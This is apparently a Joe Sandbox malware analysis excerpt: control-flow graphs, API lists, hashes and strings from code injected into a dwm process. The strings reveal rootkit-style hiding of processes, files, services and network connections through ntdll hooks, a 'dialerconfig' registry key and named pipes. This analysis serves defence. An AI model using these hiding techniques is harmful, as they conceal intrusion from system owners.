14133->14134 14135 2baaedb4f33 14134->14135 14136 2baaedb4f02 VirtualProtect FlushInstructionCache 14134->14136 14135->14126 14136->14134 14139 2baaedb44dc 14137->14139 14138 2baaedb453f 14138->14124 14139->14138 14140 2baaedb44f2 VirtualFree 14139->14140 14140->14139 14142 2baaedb7a29 14141->14142 14143 2baaedb7a34 14142->14143 14144 2baaedb820c IsProcessorFeaturePresent 14142->14144 14143->14132 14145 2baaedb8224 14144->14145 14148 2baaedb8400 RtlCaptureContext 14145->14148 14147 2baaedb8237 14147->14132 14149 2baaedb841a RtlLookupFunctionEntry 14148->14149 14150 2baaedb8469 14149->14150 14151 2baaedb8430 RtlVirtualUnwind 14149->14151 14150->14147 14151->14149 14151->14150

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001A.00000002.2996259729.000002BAAEDB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDB0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_26_2_2baaedb0000_dwm.jbxd
                                                Similarity
                                                • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                • API String ID: 106492572-2879589442
                                                • Opcode ID: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
                                                • Instruction ID: 1e86fe2e7205eafb2ec09bd88abebd2a24caa4bf333795e7070caba05147ffd4
                                                • Opcode Fuzzy Hash: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
                                                • Instruction Fuzzy Hash: C7711936710A5096FB219F76E89869D37B4FB88BC8F601125DE8E47B68EF38C444C761

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 51 2baaedb5c10-2baaedb5c37 52 2baaedb5c39-2baaedb5c48 51->52 53 2baaedb5c4b-2baaedb5c56 GetCurrentThreadId 51->53 52->53 54 2baaedb5c62-2baaedb5c69 53->54 55 2baaedb5c58-2baaedb5c5d 53->55 57 2baaedb5c7b-2baaedb5c8f 54->57 58 2baaedb5c6b-2baaedb5c76 call 2baaedb5a40 54->58 56 2baaedb608f-2baaedb60a6 call 2baaedb7a20 55->56 59 2baaedb5c9e-2baaedb5ca4 57->59 58->56 63 2baaedb5d75-2baaedb5d96 59->63 64 2baaedb5caa-2baaedb5cb3 59->64 70 2baaedb5d9c-2baaedb5dbc GetThreadContext 63->70 71 2baaedb5eff-2baaedb5f10 call 2baaedb759f 63->71 67 2baaedb5cb5-2baaedb5cf8 call 2baaedb86a0 64->67 68 2baaedb5cfa-2baaedb5d6d call 2baaedb45f0 call 2baaedb4590 call 2baaedb4550 64->68 79 2baaedb5d70 67->79 68->79 74 2baaedb5dc2-2baaedb5de3 70->74 75 2baaedb5efa 70->75 83 2baaedb5f15-2baaedb5f1b 71->83 74->75 85 2baaedb5de9-2baaedb5df2 74->85 75->71 79->59 88 2baaedb5f21-2baaedb5f78 VirtualProtect FlushInstructionCache 83->88 89 2baaedb5fde-2baaedb5fee 83->89 86 2baaedb5df4-2baaedb5e05 85->86 87 2baaedb5e72-2baaedb5e83 85->87 91 2baaedb5e07-2baaedb5e1c 86->91 92 2baaedb5e6d 86->92 95 2baaedb5ef5 87->95 96 2baaedb5e85-2baaedb5ea3 87->96 93 2baaedb5fa9-2baaedb5fd9 call 2baaedb798c 88->93 94 2baaedb5f7a-2baaedb5f84 88->94 97 2baaedb5ff0-2baaedb5ff7 89->97 98 2baaedb5ffe-2baaedb600a call 2baaedb4ed0 89->98 91->92 100 2baaedb5e1e-2baaedb5e68 call 2baaedb3a50 SetThreadContext 91->100 92->95 93->83 94->93 101 2baaedb5f86-2baaedb5fa1 call 2baaedb4470 94->101 96->95 103 2baaedb5ea5-2baaedb5eec call 2baaedb39e0 96->103 97->98 104 2baaedb5ff9 call 2baaedb44c0 97->104 112 2baaedb600f-2baaedb6015 98->112 100->92 101->93 103->95 118 2baaedb5ef0 call 2baaedb75bd 103->118 104->98 116 2baaedb6057-2baaedb6075 112->116 117 2baaedb6017-2baaedb6055 ResumeThread call 2baaedb798c 112->117 120 2baaedb6089 116->120 121 2baaedb6077-2baaedb6086 116->121 117->112 118->95 120->56 121->120
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000001A.00000002.2996259729.000002BAAEDB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDB0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_26_2_2baaedb0000_dwm.jbxd
                                                Similarity
                                                • API ID: Thread$Current$Context
                                                • String ID:
                                                • API String ID: 1666949209-0
                                                • Opcode ID: 196898b9c00e9a2a94215751572aa4ea3ed8279feab0b04f45af8764fe45d318
                                                • Instruction ID: bbe707b6b7f36c3fbfad6163ec7464966c680acce18abbd661bba50997f59a92
                                                • Opcode Fuzzy Hash: 196898b9c00e9a2a94215751572aa4ea3ed8279feab0b04f45af8764fe45d318
                                                • Instruction Fuzzy Hash: BCD1A076208B88C6EA70DB1AE49435A77B1F3C8B88F200616EACD47BA5DF3DC551CB11

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 123 2baaedb51b0-2baaedb51dc 124 2baaedb51ed-2baaedb51f6 123->124 125 2baaedb51de-2baaedb51e6 123->125 126 2baaedb51f8-2baaedb5200 124->126 127 2baaedb5207-2baaedb5210 124->127 125->124 126->127 128 2baaedb5212-2baaedb521a 127->128 129 2baaedb5221-2baaedb522a 127->129 128->129 130 2baaedb5236-2baaedb5241 GetCurrentThreadId 129->130 131 2baaedb522c-2baaedb5231 129->131 133 2baaedb5243-2baaedb5248 130->133 134 2baaedb524d-2baaedb5254 130->134 132 2baaedb57b3-2baaedb57ba 131->132 133->132 135 2baaedb5256-2baaedb525c 134->135 136 2baaedb5261-2baaedb526a 134->136 135->132 137 2baaedb5276-2baaedb5282 136->137 138 2baaedb526c-2baaedb5271 136->138 139 2baaedb5284-2baaedb52a9 137->139 140 2baaedb52ae-2baaedb5305 call 2baaedb57c0 * 2 137->140 138->132 139->132 145 2baaedb5307-2baaedb530e 140->145 146 2baaedb531a-2baaedb5323 140->146 147 2baaedb5316 145->147 148 2baaedb5310 145->148 149 2baaedb5335-2baaedb533e 146->149 150 2baaedb5325-2baaedb5332 146->150 154 2baaedb5386-2baaedb538a 147->154 153 2baaedb5390-2baaedb5396 148->153 151 2baaedb5353-2baaedb5378 call 2baaedb7950 149->151 152 2baaedb5340-2baaedb5350 149->152 150->149 162 2baaedb540d-2baaedb5422 call 2baaedb3da0 151->162 163 2baaedb537e 151->163 152->151 156 2baaedb53c5-2baaedb53cb 153->156 157 2baaedb5398-2baaedb53b4 call 2baaedb4470 153->157 154->153 160 2baaedb53f5-2baaedb5408 156->160 161 2baaedb53cd-2baaedb53ec call 2baaedb798c 156->161 157->156 167 2baaedb53b6-2baaedb53be 157->167 160->132 161->160 170 2baaedb5424-2baaedb542c 162->170 171 2baaedb5431-2baaedb543a 162->171 163->154 167->156 170->154 172 2baaedb544c-2baaedb549a call 2baaedb8d50 171->172 173 2baaedb543c-2baaedb5449 171->173 176 2baaedb54a2-2baaedb54aa 172->176 173->172 177 2baaedb55b7-2baaedb55bf 176->177 178 2baaedb54b0-2baaedb559b call 2baaedb7520 176->178 179 2baaedb5603-2baaedb560b 177->179 180 2baaedb55c1-2baaedb55d4 call 2baaedb4670 177->180 190 2baaedb559d 178->190 191 2baaedb559f-2baaedb55ae call 2baaedb4140 178->191 183 2baaedb5617-2baaedb5626 179->183 184 2baaedb560d-2baaedb5615 179->184 195 2baaedb55d8-2baaedb5601 180->195 196 2baaedb55d6 180->196 188 2baaedb5628 183->188 189 2baaedb562f 183->189 184->183 187 2baaedb5634-2baaedb5641 184->187 193 2baaedb5644-2baaedb5699 call 2baaedb86a0 187->193 194 2baaedb5643 187->194 188->189 189->187 190->177 199 2baaedb55b2 191->199 200 2baaedb55b0 191->200 202 2baaedb56a8-2baaedb5741 call 2baaedb45f0 call 2baaedb4550 VirtualProtect 193->202 203 2baaedb569b-2baaedb56a3 193->203 194->193 195->177 196->179 199->176 200->177 208 2baaedb5743-2baaedb5748 GetLastError 202->208 209 2baaedb5751-2baaedb57b1 202->209 208->209 209->132
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000001A.00000002.2996259729.000002BAAEDB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDB0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_26_2_2baaedb0000_dwm.jbxd
                                                Similarity
                                                • API ID: CurrentThread
                                                • String ID:
                                                • API String ID: 2882836952-0
                                                • Opcode ID: 06d11d655de32e38fd8e5a073ca3ca46fe81f5eb7042fdfe4678ea390cd256b7
                                                • Instruction ID: 741b00d85598c565b5f88a5aa51b3969b09740c4a5e6e398a6ac4812dff4893d
                                                • Opcode Fuzzy Hash: 06d11d655de32e38fd8e5a073ca3ca46fe81f5eb7042fdfe4678ea390cd256b7
                                                • Instruction Fuzzy Hash: 5902D832219B8086EBA0DB55E49835AB7B1F3C5784F201515EACE87BA8EF7CC494CF11

                                                Control-flow Graph

                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000001A.00000002.2996259729.000002BAAEDB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDB0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_26_2_2baaedb0000_dwm.jbxd
                                                Similarity
                                                • API ID: CurrentProcessProtectVirtual$HandleModule
                                                • String ID:
                                                • API String ID: 1092925422-0
                                                • Opcode ID: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
                                                • Instruction ID: 21aeb620c3a84e7a8438ecedfdfe25f9be25e782a330bc914190a096df78c764
                                                • Opcode Fuzzy Hash: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
                                                • Instruction Fuzzy Hash: CE11F72A705B4186FB559B21F4082AA77B4FB88B84F244029DECD07794EF3DC549D725

                                                Control-flow Graph

                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000001A.00000002.2996259729.000002BAAEDB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDB0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_26_2_2baaedb0000_dwm.jbxd
                                                Similarity
                                                • API ID: Virtual$AllocQuery
                                                • String ID:
                                                • API String ID: 31662377-0
                                                • Opcode ID: 6886080a5e420ef5f5b7cbc5977cea8f3533897ae81ff2ee1a15dfd3048d8c27
                                                • Instruction ID: 3f065a3df95fb76558a1c68ddb000ada306c4925dae015b3fb91056b7376d919
                                                • Opcode Fuzzy Hash: 6886080a5e420ef5f5b7cbc5977cea8f3533897ae81ff2ee1a15dfd3048d8c27
                                                • Instruction Fuzzy Hash: 8E31F022219A8481FA70DB15E45835BB7B4F388784F700625F5CD46BA8EFBDC550DB25

                                                Control-flow Graph

                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000001A.00000002.2996259729.000002BAAEDB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDB0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_26_2_2baaedb0000_dwm.jbxd
                                                Similarity
                                                • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                • String ID:
                                                • API String ID: 1683269324-0
                                                • Opcode ID: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
                                                • Instruction ID: d113ca70f49262fe0274de71b7c32930603b06937ee7d5c3002fc8d19919749e
                                                • Opcode Fuzzy Hash: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
                                                • Instruction Fuzzy Hash: 55116171A1061185FB269731B54E76A73B0F794344F74002999CE89194FFBDD044E373

                                                Control-flow Graph

                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000001A.00000002.2996259729.000002BAAEDB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDB0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_26_2_2baaedb0000_dwm.jbxd
                                                Similarity
                                                • API ID: CacheCurrentFlushInstructionProcessProtectVirtual
                                                • String ID:
                                                • API String ID: 3733156554-0
                                                • Opcode ID: 850510bb2ba42cc871c3507ea1c994e32bc1ac022eb00db290021f97f82b562b
                                                • Instruction ID: bf637508d8b13d975d35479a48e966e585679f30e3dab5e475b0886930fee4ec
                                                • Opcode Fuzzy Hash: 850510bb2ba42cc871c3507ea1c994e32bc1ac022eb00db290021f97f82b562b
                                                • Instruction Fuzzy Hash: BCF03A26218B4481E630DB06E45974BBBB0E3CC7E4F240211FACD47BA9EF38C680CB11

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 263 2baaed82908-2baaed82973 call 2baaed80f34 * 4 272 2baaed82979-2baaed8297c 263->272 273 2baaed82b8b 263->273 272->273 275 2baaed82982-2baaed82985 272->275 274 2baaed82b8d-2baaed82ba9 273->274 275->273 276 2baaed8298b-2baaed8298e 275->276 276->273 277 2baaed82994-2baaed829b2 VirtualAlloc 276->277 277->273 278 2baaed829b8-2baaed829dc call 2baaed80d6c 277->278 281 2baaed82a0b-2baaed82a12 278->281 282 2baaed829de-2baaed82a09 call 2baaed80d6c 278->282 284 2baaed82ab2-2baaed82ab9 281->284 285 2baaed82a18-2baaed82a25 281->285 282->281 286 2baaed82b6c-2baaed82b89 284->286 287 2baaed82abf-2baaed82ad6 284->287 285->284 289 2baaed82a2b-2baaed82a39 LoadLibraryA 285->289 286->274 287->286 290 2baaed82adc 287->290 291 2baaed82a3b-2baaed82a45 289->291 292 2baaed82a9d-2baaed82aa5 289->292 294 2baaed82ae2-2baaed82af7 290->294 295 2baaed82a48-2baaed82a4c 291->295 292->289 296 2baaed82aa7-2baaed82aac 292->296 297 2baaed82af9-2baaed82b0a 294->297 298 2baaed82b5b-2baaed82b66 294->298 299 2baaed82a9a 295->299 300 2baaed82a4e-2baaed82a52 295->300 296->284 302 2baaed82b15-2baaed82b19 297->302 303 2baaed82b0c-2baaed82b13 297->303 298->286 298->294 299->292 304 2baaed82a54-2baaed82a7b 300->304 305 2baaed82a7d-2baaed82a87 300->305 307 2baaed82b24-2baaed82b28 302->307 308 2baaed82b1b-2baaed82b22 302->308 306 2baaed82b48-2baaed82b59 303->306 309 2baaed82a8d-2baaed82a98 304->309 305->309 306->297 306->298 310 2baaed82b3a-2baaed82b3e 307->310 311 2baaed82b2a-2baaed82b38 307->311 308->306 309->295 310->306 312 2baaed82b40-2baaed82b43 310->312 311->306 312->306
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000001A.00000002.2996207856.000002BAAED80000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAED80000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_26_2_2baaed80000_dwm.jbxd
                                                Similarity
                                                • API ID: AllocLibraryLoadVirtual
                                                • String ID:
                                                • API String ID: 3550616410-0
                                                • Opcode ID: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
                                                • Instruction ID: d68129767a834a96e50de18453de40ab19bf911d8bbe2b168271e1e7c2de839b
                                                • Opcode Fuzzy Hash: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
                                                • Instruction Fuzzy Hash: E261347270229187EB68CF1AD45877DB3B5FB24B94F648021DA9D07789DB38E853C722

                                                Control-flow Graph

                                                APIs
                                                  • Part of subcall function 000002BAAEDB1650: GetProcessHeap.KERNEL32 ref: 000002BAAEDB165B
                                                  • Part of subcall function 000002BAAEDB1650: HeapAlloc.KERNEL32 ref: 000002BAAEDB166A
                                                  • Part of subcall function 000002BAAEDB1650: RegOpenKeyExW.ADVAPI32 ref: 000002BAAEDB16DA
                                                  • Part of subcall function 000002BAAEDB1650: RegOpenKeyExW.ADVAPI32 ref: 000002BAAEDB1707
                                                  • Part of subcall function 000002BAAEDB1650: RegCloseKey.ADVAPI32 ref: 000002BAAEDB1721
                                                  • Part of subcall function 000002BAAEDB1650: RegOpenKeyExW.ADVAPI32 ref: 000002BAAEDB1741
                                                  • Part of subcall function 000002BAAEDB1650: RegCloseKey.ADVAPI32 ref: 000002BAAEDB175C
                                                  • Part of subcall function 000002BAAEDB1650: RegOpenKeyExW.ADVAPI32 ref: 000002BAAEDB177C
                                                  • Part of subcall function 000002BAAEDB1650: RegCloseKey.ADVAPI32 ref: 000002BAAEDB1797
                                                  • Part of subcall function 000002BAAEDB1650: RegOpenKeyExW.ADVAPI32 ref: 000002BAAEDB17B7
                                                  • Part of subcall function 000002BAAEDB1650: RegCloseKey.ADVAPI32 ref: 000002BAAEDB17D2
                                                  • Part of subcall function 000002BAAEDB1650: RegOpenKeyExW.ADVAPI32 ref: 000002BAAEDB17F2
                                                • Sleep.KERNEL32 ref: 000002BAAEDB1C43
                                                • SleepEx.KERNEL32 ref: 000002BAAEDB1C49
                                                  • Part of subcall function 000002BAAEDB1650: RegCloseKey.ADVAPI32 ref: 000002BAAEDB180D
                                                  • Part of subcall function 000002BAAEDB1650: RegOpenKeyExW.ADVAPI32 ref: 000002BAAEDB182D
                                                  • Part of subcall function 000002BAAEDB1650: RegCloseKey.ADVAPI32 ref: 000002BAAEDB1848
                                                  • Part of subcall function 000002BAAEDB1650: RegOpenKeyExW.ADVAPI32 ref: 000002BAAEDB1868
                                                  • Part of subcall function 000002BAAEDB1650: RegCloseKey.ADVAPI32 ref: 000002BAAEDB1883
                                                  • Part of subcall function 000002BAAEDB1650: RegOpenKeyExW.ADVAPI32 ref: 000002BAAEDB18A3
                                                  • Part of subcall function 000002BAAEDB1650: RegCloseKey.ADVAPI32 ref: 000002BAAEDB18BE
                                                  • Part of subcall function 000002BAAEDB1650: RegCloseKey.ADVAPI32 ref: 000002BAAEDB18C8
                                                Memory Dump Source
                                                • Source File: 0000001A.00000002.2996259729.000002BAAEDB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDB0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_26_2_2baaedb0000_dwm.jbxd
                                                Similarity
                                                • API ID: CloseOpen$HeapSleep$AllocProcess
                                                • String ID:
                                                • API String ID: 1534210851-0
                                                • Opcode ID: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
                                                • Instruction ID: 9bf767cf131310899e9c5d49bb0b649a76f6aefae3c4f8c2a88701203a0a1f2a
                                                • Opcode Fuzzy Hash: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
                                                • Instruction Fuzzy Hash: F631BE65210A0291FB509F36DA6D36A33B5AB44BD0F34642DDECD87796FF24C860C272

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 415 2baaedb2cdc-2baaedb2d55 call 2baaedcecc0 418 2baaedb2d5b-2baaedb2d61 415->418 419 2baaedb3090-2baaedb30b3 415->419 418->419 420 2baaedb2d67-2baaedb2d6a 418->420 420->419 421 2baaedb2d70-2baaedb2d73 420->421 421->419 422 2baaedb2d79-2baaedb2d89 GetModuleHandleA 421->422 423 2baaedb2d9d 422->423 424 2baaedb2d8b-2baaedb2d9b call 2baaedc3090 422->424 425 2baaedb2da0-2baaedb2dbe 423->425 424->425 425->419 429 2baaedb2dc4-2baaedb2de3 StrCmpNIW 425->429 429->419 430 2baaedb2de9-2baaedb2ded 429->430 430->419 431 2baaedb2df3-2baaedb2dfd 430->431 431->419 432 2baaedb2e03-2baaedb2e0a 431->432 432->419 433 2baaedb2e10-2baaedb2e23 432->433 434 2baaedb2e25-2baaedb2e31 433->434 435 2baaedb2e33 433->435 436 2baaedb2e36-2baaedb2e3a 434->436 435->436 437 2baaedb2e3c-2baaedb2e48 436->437 438 2baaedb2e4a 436->438 439 2baaedb2e4d-2baaedb2e57 437->439 438->439 440 2baaedb2f4d-2baaedb2f51 439->440 441 2baaedb2e5d-2baaedb2e60 439->441 444 2baaedb3082-2baaedb308a 440->444 445 2baaedb2f57-2baaedb2f5a 440->445 442 2baaedb2e72-2baaedb2e7c 441->442 443 2baaedb2e62-2baaedb2e6f call 2baaedb1a14 441->443 447 2baaedb2eb0-2baaedb2eba 442->447 448 2baaedb2e7e-2baaedb2e8b 442->448 443->442 444->419 444->433 449 2baaedb2f5c-2baaedb2f68 call 2baaedb1a14 445->449 450 2baaedb2f6b-2baaedb2f75 445->450 455 2baaedb2ebc-2baaedb2ec9 447->455 456 2baaedb2eea-2baaedb2eed 447->456 448->447 454 2baaedb2e8d-2baaedb2e9a 448->454 449->450 451 2baaedb2fa5-2baaedb2fa8 450->451 452 2baaedb2f77-2baaedb2f84 450->452 459 2baaedb2fb5-2baaedb2fc2 lstrlenW 451->459 460 2baaedb2faa-2baaedb2fb3 call 2baaedb1d28 451->460 452->451 458 2baaedb2f86-2baaedb2f93 452->458 461 2baaedb2e9d-2baaedb2ea3 454->461 455->456 462 2baaedb2ecb-2baaedb2ed8 455->462 463 2baaedb2efb-2baaedb2f08 lstrlenW 456->463 464 2baaedb2eef-2baaedb2ef9 call 2baaedb1d28 456->464 466 2baaedb2f96-2baaedb2f9c 458->466 472 2baaedb2fe5-2baaedb2fef call 2baaedb3930 459->472 473 2baaedb2fc4-2baaedb2fce 459->473 460->459 477 2baaedb2ffa-2baaedb3005 460->477 470 2baaedb2f43-2baaedb2f48 461->470 471 2baaedb2ea9-2baaedb2eae 461->471 474 2baaedb2edb-2baaedb2ee1 462->474 467 2baaedb2f2b-2baaedb2f3d call 2baaedb3930 463->467 468 2baaedb2f0a-2baaedb2f14 463->468 464->463 464->470 466->477 478 2baaedb2f9e-2baaedb2fa3 466->478 467->470 482 2baaedb2ff2-2baaedb2ff4 467->482 468->467 479 2baaedb2f16-2baaedb2f29 call 2baaedb1554 468->479 470->482 471->447 471->461 472->482 473->472 483 2baaedb2fd0-2baaedb2fe3 call 2baaedb1554 473->483 474->470 484 2baaedb2ee3-2baaedb2ee8 474->484 486 2baaedb3007-2baaedb300b 477->486 487 2baaedb307c-2baaedb3080 477->487 478->451 478->466 479->467 479->470 482->444 482->477 483->472 483->477 484->456 484->474 492 2baaedb3013-2baaedb302d call 2baaedb86a0 486->492 493 2baaedb300d-2baaedb3011 486->493 487->444 496 2baaedb3030-2baaedb3033 492->496 493->492 493->496 499 2baaedb3035-2baaedb3053 call 2baaedb86a0 496->499 500 2baaedb3056-2baaedb3059 496->500 499->500 500->487 502 2baaedb305b-2baaedb3079 call 2baaedb86a0 500->502 502->487
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001A.00000002.2996259729.000002BAAEDB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDB0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_26_2_2baaedb0000_dwm.jbxd
                                                Similarity
                                                • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                • API String ID: 2119608203-3850299575
                                                • Opcode ID: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
                                                • Instruction ID: d0df28f5b54def0f348886daa371fea20f351f4874dac32785d3522283baec72
                                                • Opcode Fuzzy Hash: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
                                                • Instruction Fuzzy Hash: A8B1B073220A5082FB698F2AD5487A973B4FB89B84F645016EE8D53794FF75CD40C362
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000001A.00000002.2996259729.000002BAAEDB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDB0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_26_2_2baaedb0000_dwm.jbxd
                                                Similarity
                                                • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                • String ID:
                                                • API String ID: 3140674995-0
                                                • Opcode ID: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
                                                • Instruction ID: a6a6e3a706670074ac241bc5ce13e5692aab6026ad8fb856e39973e7621a7b8a
                                                • Opcode Fuzzy Hash: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
                                                • Instruction Fuzzy Hash: 3A318E72204B808AFB608F70E8443EE7370F788744F54452ADA8E57B98EF38C648C720
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000001A.00000002.2996259729.000002BAAEDB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDB0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_26_2_2baaedb0000_dwm.jbxd
                                                Similarity
                                                • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                • String ID:
                                                • API String ID: 1239891234-0
                                                • Opcode ID: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
                                                • Instruction ID: 6a5e4ff0647449210e6d303325f1cd7f509e44abf96698d8bee52b775b153712
                                                • Opcode Fuzzy Hash: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
                                                • Instruction Fuzzy Hash: 75314B36214F8086EB60CF25E84439E73B4F788B94F600526EA9D47BA9EF38C555CB11
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000001A.00000002.2996259729.000002BAAEDB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDB0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_26_2_2baaedb0000_dwm.jbxd
                                                Similarity
                                                • API ID: ErrorFileLastWrite$ConsoleOutput
                                                • String ID:
                                                • API String ID: 1443284424-0
                                                • Opcode ID: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
                                                • Instruction ID: c105326b7bdc61d720b967c56eb839311dc6dbaf176ed9c494eb50a8762152aa
                                                • Opcode Fuzzy Hash: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
                                                • Instruction Fuzzy Hash: 61E1DF72B14A809AE702CF74D4982DD7BB1F3857C8F248216DE8E57B99EB38C51AC711

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001A.00000002.2996259729.000002BAAEDB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDB0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_26_2_2baaedb0000_dwm.jbxd
                                                Similarity
                                                • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                • String ID: d
                                                • API String ID: 2005889112-2564639436
                                                • Opcode ID: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
                                                • Instruction ID: acdf4d1fdfc89274e76a21760b0cdd48ac121817a5367255b19e53eaa4a7f8c2
                                                • Opcode Fuzzy Hash: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
                                                • Instruction Fuzzy Hash: 40515B72214B44DBEB15CF62E54839AB3B1F789BC0F548228DA8D07B58EF38C566CB51

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001A.00000002.2996259729.000002BAAEDB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDB0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_26_2_2baaedb0000_dwm.jbxd
                                                Similarity
                                                • API ID: CurrentThread$AddressHandleModuleProc
                                                • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                • API String ID: 4175298099-1975688563
                                                • Opcode ID: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
                                                • Instruction ID: 89ee6f72e2a42ab17cced8e8e078ada073b920a50a376e3e88a103d5255c52a8
                                                • Opcode Fuzzy Hash: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
                                                • Instruction Fuzzy Hash: CD31A3A210094AA0FB0AEF79E95E6D43331B7943C4FE05513E99E161B5AF39C649C3B3

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001A.00000002.2996259729.000002BAAEDB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDB0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_26_2_2baaedb0000_dwm.jbxd
                                                Similarity
                                                • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                • API String ID: 2171963597-1373409510
                                                • Opcode ID: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
                                                • Instruction ID: 493de7bb044fff9f3caa7959a2c753dca1dded61462356798fb8e7264277a659
                                                • Opcode Fuzzy Hash: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
                                                • Instruction Fuzzy Hash: 66211836614B4086FB118B25E54836A77B0F789BE4F604215EA9D46FA8DF3CC149CB12

